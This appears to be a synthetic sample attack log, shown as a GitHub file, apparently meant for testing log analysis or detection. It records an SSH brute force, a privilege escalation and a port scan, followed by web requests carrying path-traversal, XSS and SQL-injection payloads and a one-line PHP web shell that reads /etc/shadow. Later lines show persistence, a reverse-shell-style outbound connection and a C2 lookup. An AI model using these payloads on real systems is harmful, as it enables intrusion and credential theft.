-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathsample-attack.log
More file actions
39 lines (39 loc) · 4.14 KB
/
sample-attack.log
File metadata and controls
39 lines (39 loc) · 4.14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Mar 5 02:14:01 webserver CRON[4521]: (root) CMD (/usr/lib/nagios/plugins/check_disk -w 20% -c 10%)
Mar 5 02:14:03 webserver sshd[8841]: Accepted publickey for admin from 10.0.1.50 port 52100 ssh2
Mar 5 02:15:22 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:24 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:25 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:27 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:28 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:30 webserver sshd[9103]: Failed password for invalid user admin from 203.0.113.42 port 44580 ssh2
Mar 5 02:15:31 webserver sshd[9103]: Failed password for invalid user admin from 203.0.113.42 port 44580 ssh2
Mar 5 02:15:33 webserver sshd[9104]: Failed password for invalid user test from 203.0.113.42 port 44821 ssh2
Mar 5 02:15:45 webserver sshd[9105]: Accepted password for www-data from 203.0.113.42 port 45001 ssh2
Mar 5 02:15:47 webserver sudo: www-data : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/bin/bash
Mar 5 02:15:48 webserver su[9201]: pam_unix(su:session): session opened for user root by www-data(uid=33)
Mar 5 02:16:01 webserver kernel: [45821.332] TCP: Possible SYN flooding on port 443. Sending cookies.
Mar 5 02:16:15 webserver kernel: [45835.112] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=22
Mar 5 02:16:22 webserver kernel: [45842.001] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=23
Mar 5 02:16:23 webserver kernel: [45843.102] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=80
Mar 5 02:16:24 webserver kernel: [45844.203] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=443
Mar 5 02:16:25 webserver kernel: [45845.304] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=3306
Mar 5 02:16:26 webserver kernel: [45846.405] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=8080
203.0.113.42 - - [05/Mar/2026:02:17:01 +0000] "GET /admin/login.php HTTP/1.1" 200 4521
203.0.113.42 - - [05/Mar/2026:02:17:05 +0000] "POST /admin/login.php HTTP/1.1" 302 0
203.0.113.42 - - [05/Mar/2026:02:17:08 +0000] "GET /admin/../../../etc/passwd HTTP/1.1" 400 299
203.0.113.42 - - [05/Mar/2026:02:17:10 +0000] "GET /search?q=<script>alert(document.cookie)</script> HTTP/1.1" 200 8192
203.0.113.42 - - [05/Mar/2026:02:17:12 +0000] "GET /products?id=1'+OR+1=1--+ HTTP/1.1" 200 15823
203.0.113.42 - - [05/Mar/2026:02:17:15 +0000] "GET /products?id=1+UNION+SELECT+username,password+FROM+users-- HTTP/1.1" 200 982
203.0.113.42 - - [05/Mar/2026:02:17:18 +0000] "POST /upload.php HTTP/1.1" 200 48 "<?php system($_GET['cmd']); ?>"
203.0.113.42 - - [05/Mar/2026:02:17:22 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 32
203.0.113.42 - - [05/Mar/2026:02:17:25 +0000] "GET /uploads/shell.php?cmd=cat+/etc/shadow HTTP/1.1" 200 1520
Mar 5 02:17:30 webserver kernel: [45910.882] audit: type=1400 msg=audit(1741140050.882:412): operation="exec" pid=9312 comm="bash" name="/dev/shm/.x" requested_mask="x"
Mar 5 02:17:32 webserver crontab[9315]: (www-data) REPLACE (www-data) crontab entry modified
Mar 5 02:17:35 webserver kernel: [45915.201] process 9320 (kworker/u:0) attempted to connect to 192.0.2.99:4444
Mar 5 02:17:38 webserver sshd[9325]: reverse mapping checking getaddrinfo for 42-113-0-203.dynamic.example.com [203.0.113.42] failed
Mar 5 02:17:40 webserver named[1201]: client 203.0.113.42#53491: query (cache) 'evil.c2server.xyz/A/IN' denied
Mar 5 02:17:45 webserver kernel: [45925.551] Out of memory: Kill process 3122 (mysqld) score 901 or sacrifice child
Mar 5 02:17:50 webserver postfix/smtpd[9401]: NOQUEUE: reject: RCPT from unknown[203.0.113.42]: 554 Relay access denied
Mar 5 02:18:01 webserver systemd[1]: Starting Daily apt upgrade and clean activities...
Mar 5 02:18:15 webserver systemd[1]: Started Daily apt upgrade and clean activities.
Mar 5 02:18:30 webserver sshd[9501]: Received disconnect from 10.0.1.50 port 52100:11: disconnected by user